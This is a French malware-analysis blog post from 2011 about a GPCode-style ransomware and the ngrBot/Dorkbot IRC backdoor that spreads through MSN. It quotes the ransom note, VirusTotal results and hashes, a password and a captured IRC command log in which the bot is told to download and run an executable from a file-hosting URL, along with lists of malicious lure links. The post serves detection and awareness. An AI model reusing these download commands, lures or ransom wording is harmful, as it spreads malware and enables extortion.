Un nouveau venu dans les packs de malwares aujourd’hui…
Ce dernier fait penser à GPCode qui est un ransomware. Ce dernier encode les documents, un message est donné où vous devez envoyer de l’argent pour obtenir la clef pour débloquer vos documents (rien ne garanti qu’elle soit donnée en retour).
Le fond d’écran est modifié :
En plus des documents, les raccourcis sont encodés.
Un fichier HOW TO DECRYPT FILES.txt est créé sur le bureau et ouvert, ce dernier contient ce texte :
Attention!!!
All your personal files (photo, documents, texts, databases, certificates, video) have been encrypted by a very strong cypher RSA-1024. The original files were deleted. You can check – just look for files in all folders.
There is no possibility to decrypt these files without a special decrypt program! Nobody can help you – even don’t try to find another method or tell anybody. Also after n days all encrypted files will be completely deleted and you will have no chance to get it back.
We can help to solve this task for 125$ via ukash/psc pre-paid cards. And remember: any harmful or bad words to our side will be a reason for ingoring your message and nothing will be done.
For details you have to send your request on this e-mail (attach to message a full serial key shown below in this ‘how to..’ file on desktop): filemaker@safe-mail.net
44505212A536CB6D189E23A4EA80A97E0735285AAA3A8A3D41443A6DCB60C8C65E8DC58FE9697291436D7097D092C2E2E13DECB51B314612A117F0D3B93F5068
99EB792633D7552B428A7F5568154E597650D5459D2802C6DB66C8B1D31E3476B7378E1C4BCD932B739C53C91C9D27F99637ECCF63AFCE8B227ABAE07DAA1F28
Le malware a des fonctionnalités de Backdoor IRC et se propage par MSN – ce qui fait penser aux Les Virus MSN
:xxx!p@symtec.us TOPIC #nn :.m.s|.m.e Breaking news, a tsunami and possibly earthquake is comming to thailand. Its expected to hit in less then 24 hours. If you do not belive this message, please. View our LIVE Images: http://rapidshare.com/files/454292304/picture935-2011.JPG-thailand.com?=
L’utilisation de rapishare n’étant pas nouvelle :
https://forum.malekal.com/http-rapidshare-com-files-452642308-image545-mileycy-jpg-www-facebook-com-t31855.html
https://forum.malekal.com/post238930.html?hilit=rapidshare#p238930
https://forum.malekal.com/post237285.html?hilit=rapidshare#p237285
https://forum.malekal.com/post237075.html?hilit=rapidshare#p237075
https://forum.malekal.com/post234409.html?hilit=rapidshare#p234409
etc
L’utilisation de la clef Run Windows UDP Control Center
Le mot de passe : letmein
Cela fait penser aux groupes ASC : https://forum.malekal.com/208-183-223-buzus-t27272.html#p215236
Dans le passé Kaspersky avait réussi à casser une des clefs et proposer un removal tools qui redonnait la main aux documents.
Reste à voir si cela est encore possible, si l’infection est bien faite, sachant que casser une clef 1024 est casi impossible, la récupération des documents peut s’avérer difficile.
La détection du dropper au moment où ces lignes sont écrites :
File name: knockout.exe
Submission date: 2011-03-25 12:57:00 (UTC)
Current status: finished
Result: 7/ 41 (17.1%)
VT Community
not reviewed
Safety score: –
Compact
Print results
Antivirus Version Last Update Result
AhnLab-V3 2011.03.25.01 2011.03.25 –
AntiVir 7.11.5.74 2011.03.25 –
Antiy-AVL 2.0.3.7 2011.03.25 –
Avast 4.8.1351.0 2011.03.25 Win32:Kryptik-AZZ
Avast5 5.0.677.0 2011.03.25 Win32:Kryptik-AZZ
AVG 10.0.0.1190 2011.03.25 –
BitDefender 7.2 2011.03.25 Dropped:Trojan.Generic.KD.167224
CAT-QuickHeal 11.00 2011.03.25 –
ClamAV 0.96.4.0 2011.03.25 –
Commtouch 5.2.11.5 2011.03.24 –
Comodo 8100 2011.03.25 Heur.Packed.Unknown
DrWeb 5.0.2.03300 2011.03.25 BackDoor.IRC.Sdbot.4246
eSafe 7.0.17.0 2011.03.24 –
eTrust-Vet 36.1.8235 2011.03.25 –
F-Prot 4.6.2.117 2011.03.24 –
F-Secure 9.0.16440.0 2011.03.23 –
Fortinet 4.2.254.0 2011.03.25 –
GData 21 2011.03.25 Win32:Kryptik-AZZ
Ikarus T3.1.1.97.0 2011.03.25 –
Jiangmin 13.0.900 2011.03.25 –
K7AntiVirus 9.94.4211 2011.03.25 –
McAfee 5.400.0.1158 2011.03.25 –
McAfee-GW-Edition 2010.1C 2011.03.25 –
Microsoft 1.6702 2011.03.25 –
NOD32 5984 2011.03.25 –
Norman 6.07.03 None.. –
nProtect 2011-02-10.01 2011.02.15 –
Panda 10.0.3.5 2011.03.25 –
PCTools 7.0.3.5 2011.03.25 –
Prevx 3.0 2011.03.25 –
Rising 23.50.04.06 2011.03.25 –
Sophos 4.64.0 2011.03.25 Mal/FakeAV-IU
SUPERAntiSpyware 4.40.0.1006 2011.03.25 –
Symantec 20101.3.0.103 2011.03.25 –
TheHacker 6.7.0.1.156 2011.03.24 –
TrendMicro 9.200.0.1012 2011.03.25 –
TrendMicro-HouseCall 9.200.0.1012 2011.03.25 –
VBA32 3.12.14.3 2011.03.24 –
VIPRE 8814 2011.03.25 –
ViRobot 2011.3.25.4376 2011.03.25 –
VirusBuster 13.6.269.0 2011.03.25 –
Additional information
MD5 : c66f6f2f100300da50dad509d42cf4ef
SHA1 : 86881e75fd648856fc8c6f4767ae967489b73e12
SHA256: cb1f1f83751bfb095f03c90a013d8c24a79630dc5fac21afc396df72c5cdd080
La détection du malware qui encrypte :
File name: 1.exe
Submission date: 2011-03-25 14:14:17 (UTC)
Current status: finished
Result: 2/ 43 (4.7%)
not reviewed
Safety score: –
Compact
Print results
Antivirus Version Last Update Result
AhnLab-V3 2011.03.25.01 2011.03.25 –
AntiVir 7.11.5.74 2011.03.25 –
Antiy-AVL 2.0.3.7 2011.03.25 –
Avast 4.8.1351.0 2011.03.25 –
Avast5 5.0.677.0 2011.03.25 –
AVG 10.0.0.1190 2011.03.25 –
BitDefender 7.2 2011.03.25 –
CAT-QuickHeal 11.00 2011.03.25 –
ClamAV 0.96.4.0 2011.03.25 –
Commtouch 5.2.11.5 2011.03.24 –
Comodo 8100 2011.03.25 –
DrWeb 5.0.2.03300 2011.03.25 –
Emsisoft 5.1.0.4 2011.03.25 –
eSafe 7.0.17.0 2011.03.24 –
eTrust-Vet 36.1.8235 2011.03.25 –
F-Prot 4.6.2.117 2011.03.25 –
F-Secure 9.0.16440.0 2011.03.23 –
Fortinet 4.2.254.0 2011.03.25 –
GData 21 2011.03.25 –
Ikarus T3.1.1.97.0 2011.03.25 –
Jiangmin 13.0.900 2011.03.25 –
K7AntiVirus 9.94.4211 2011.03.25 –
Kaspersky 7.0.0.125 2011.03.25 –
McAfee 5.400.0.1158 2011.03.25 –
McAfee-GW-Edition 2010.1C 2011.03.25 –
Microsoft 1.6702 2011.03.25 –
NOD32 5984 2011.03.25 –
Norman 6.07.03 2011.03.24 –
nProtect 2011-02-10.01 2011.02.15 –
Panda 10.0.3.5 2011.03.25 –
PCTools 7.0.3.5 2011.03.25 –
Prevx 3.0 2011.03.25 High Risk Cloaked Malware
Rising 23.50.04.06 2011.03.25 –
Sophos 4.64.0 2011.03.25 Mal/FakeAV-IU
SUPERAntiSpyware 4.40.0.1006 2011.03.25 –
Symantec 20101.3.0.103 2011.03.25 –
TheHacker 6.7.0.1.156 2011.03.24 –
TrendMicro 9.200.0.1012 2011.03.25 –
TrendMicro-HouseCall 9.200.0.1012 2011.03.25 –
VBA32 3.12.14.3 2011.03.25 –
VIPRE 8815 2011.03.25 –
ViRobot 2011.3.25.4376 2011.03.25 –
VirusBuster 13.6.269.0 2011.03.25 –
Additional information
MD5 : 72070d73697bf0654b0fd0945145dba4
SHA1 : 00b5ffca350d130925ebca21c680f600eeaf6b3d
SHA256: 832863ece8c7eced9395b8929b1557297feab33f8912210e8ff870ed849baab2
La Backdoor IRC : http://www.virustotal.com/file-scan/report.html?id=501c5dd144a237d3b755c9940f3d2c33dceda118fcf90b81922fb55579418b32-1301060060
File name: 799972
Submission date: 2011-03-25 13:34:20 (UTC)
Current status: finished
Result: 6 /41 (14.6%)
Print results
Antivirus Version Last Update Result
AhnLab-V3 2011.03.25.01 2011.03.25 –
AntiVir 7.11.5.74 2011.03.25 –
Antiy-AVL 2.0.3.7 2011.03.25 –
Avast 4.8.1351.0 2011.03.25 Win32:Kryptik-AZZ
Avast5 5.0.677.0 2011.03.25 Win32:Kryptik-AZZ
AVG 10.0.0.1190 2011.03.25 –
BitDefender 7.2 2011.03.25 Trojan.Generic.KD.167224
CAT-QuickHeal 11.00 2011.03.25 –
ClamAV 0.96.4.0 2011.03.25 –
Commtouch 5.2.11.5 2011.03.24 –
Comodo 8100 2011.03.25 –
DrWeb 5.0.2.03300 2011.03.25 BackDoor.IRC.Sdbot.4246
eSafe 7.0.17.0 2011.03.24 –
eTrust-Vet 36.1.8235 2011.03.25 –
F-Prot 4.6.2.117 2011.03.24 –
Fortinet 4.2.254.0 2011.03.25 –
GData 21 2011.03.25 Trojan.Generic.KD.167224
Ikarus T3.1.1.97.0 2011.03.25 –
Jiangmin 13.0.900 2011.03.25 –
K7AntiVirus 9.94.4211 2011.03.25 –
Kaspersky 7.0.0.125 2011.03.25 –
McAfee 5.400.0.1158 2011.03.25 –
McAfee-GW-Edition 2010.1C 2011.03.25 –
Microsoft 1.6702 2011.03.25 –
NOD32 5984 2011.03.25 –
Norman 6.07.03 2011.03.24 –
nProtect 2011-02-10.01 2011.02.15 –
Panda 10.0.3.5 2011.03.25 –
PCTools 7.0.3.5 2011.03.25 –
Prevx 3.0 2011.03.25 –
Rising 23.50.04.06 2011.03.25 –
Sophos 4.64.0 2011.03.25 Mal/FakeAV-IU
SUPERAntiSpyware 4.40.0.1006 2011.03.25 –
Symantec 20101.3.0.103 2011.03.25 –
TheHacker 6.7.0.1.156 2011.03.24 –
TrendMicro 9.200.0.1012 2011.03.25 –
TrendMicro-HouseCall 9.200.0.1012 2011.03.25 –
VBA32 3.12.14.3 2011.03.24 –
VIPRE 8814 2011.03.25 –
ViRobot 2011.3.25.4376 2011.03.25 –
VirusBuster 13.6.269.0 2011.03.25 –
Additional information
MD5 : c52ab4d91b899e37397ec01e5a69d0cd
SHA1 : ec733d5d5f9ac25c3ec630009acd16dc5d5ab851
SHA256: 501c5dd144a237d3b755c9940f3d2c33dceda118fcf90b81922fb55579418b32
EDIT :
La Backdoor IRC se nomme ngrBot :
PASS ngrBot:Apache2.0 NOTICE AUTH :MOTD
NICK n{FR|XPa}dvrgypt
USER dvrgypt 0 0 :dvrgypt
JOIN #ngr ngrBot
:Apache2.0 001 n{FR|XPa}dvrgypt
:Apache2.0 002 n{FR|XPa}dvrgypt
:Apache2.0 003 n{FR|XPa}dvrgypt
:Apache2.0 004 n{FR|XPa}dvrgypt
:Apache2.0 005 n{FR|XPa}dvrgypt
:Apache2.0 005 n{FR|XPa}dvrgypt
:Apache2.0 005 n{FR|XPa}dvrgypt
:Apache2.0 422 n{FR|XPa}dvrgypt :MOTD
:n{FR|XPa}dvrgypt MODE n{FR|XPa}dvrgypt :+iwG
:n{FR|XPa}dvrgypt!dvrgypt@xxxxxxxxxxx.fr JOIN :#ngr
:Apache2.0 332 n{FR|XPa}dvrgypt #ngr :.up http://rapidshare.com/files/454361616/ngr_fud.exe f02b7f011d753250cec3286ad91f6724 .msn.int # .msn.set http://redir.ec/photoalbum2011
:Apache2.0 333 n{FR|XPa}dvrgypt #ngr xxx 1301073359
JOIN #ngr ngrBot
PRIVMSG #ngr :[MSN]: Updated MSN spread interval to « 7 »
PRIVMSG #ngr :[MSN]: Updated MSN spread message to « http://redir.ec/photoalbum2011 »
:Apache2.0 404 n{FR|XPa}dvrgypt #ngr :You must have a registered nick (+r) to talk on this channel (#ngr)
:Apache2.0 404 n{FR|XPa}dvrgypt #ngr :You must have a registered nick (+r) to talk on this channel (#ngr)
PING :Apache2.0
PONG :Apache2.0
PING :Apache2.0
PONG :Apache2.0
PING :Apache2.0
PONG :Apache2.0
PING :Apache2.0
PONG :Apache2.0
Possible détection : Worm:Win32/Dorkbot.gen!A Chez Microsoft et IM-Worm.Win32.Ckbface chez Kaspersky :
- http://redir.ec/images739131?=
- http://urlcut.me/pictures7331?
- http://redir.ec/photoalbum2011
- http://urlcut.me/images2011
- http://ibe.am/pictures37571?=
- etc.
EDIT :
Poste chez Kaspersky : http://www.securelist.com/en/blog/6165/Ransomware_GPCode_strikes_back
